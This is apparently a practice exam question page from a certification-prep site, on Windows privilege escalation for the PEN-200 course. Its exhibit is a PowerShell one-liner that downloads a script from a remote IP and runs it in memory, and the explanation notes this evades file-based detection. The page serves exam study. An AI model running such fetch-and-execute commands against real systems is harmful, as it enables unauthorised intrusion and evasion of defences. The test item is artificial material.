Courseiva

PEN-200 Windows Privilege Escalation Practice Question

Exhibit

C:\Users\user> powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/privesc.ps1')"

Refer to the exhibit. What is the most likely goal of this command execution in a privilege escalation context?

⚠ Common exam trap

Candidates often assume this command is for persistence or data exfiltration. They miss that the primary goal in privilege escalation is automated enumeration to identify misconfigurations before manual exploitation begins.

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

✓

To perform automated enumeration for privilege escalation.

This command downloads and executes a PowerShell script directly into memory from a remote server. This is a common technique for running automated enumeration scripts like PowerUp or WinPEAS without writing them to the disk. By executing in memory, the attacker minimizes their footprint on the host system, avoiding detection by file-based signature scanning while gathering information about potential escalation vectors.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • ✗

    To install a persistent backdoor on the system.

    Why it's wrong here

    This command executes code in memory and does not inherently create persistent artifacts like services or registry keys. While it could be part of a larger plan to install a backdoor, the command itself is designed for enumeration and situational awareness, not for establishing persistence.

  • ✓

    To perform automated enumeration for privilege escalation.

    Why this is correct

    Scripts like PowerUp are designed to search for common misconfigurations that lead to privilege escalation. Executing such scripts from a remote server is a standard technique to quickly identify escalation paths without leaving traces on the local file system, which helps maintain operational security during an engagement.

  • ✗

    To escalate privileges to SYSTEM directly.

    Why it's wrong here

    Simply running an enumeration script does not grant SYSTEM privileges. The script identifies potential vulnerabilities, but the attacker must then manually or automatically exploit those findings to actually achieve privilege escalation. The command itself is a reconnaissance tool, not an exploit tool.

  • ✗

    To exfiltrate sensitive files from the system.

    Why it's wrong here

    This command downloads a file, it does not upload or exfiltrate data. While an attacker might follow up with exfiltration, the command shown is purely for fetching and executing a reconnaissance script to identify potential weaknesses in the target host's configuration.

About these practice questions

Courseiva writes every PEN-200 question from scratch — 285 in total, each with an explanation and a wrong-answer breakdown. None are copied from real exams or dumps. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

JA

Written and reviewed by Johnson Ajibi, MSc IT Security

Senior Network & Security Engineer · founder of Courseiva

Last reviewed September 2026 · checked against the official OffSec exam blueprint

This PEN-200 practice question is part of Courseiva's free OffSec certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PEN-200 exam.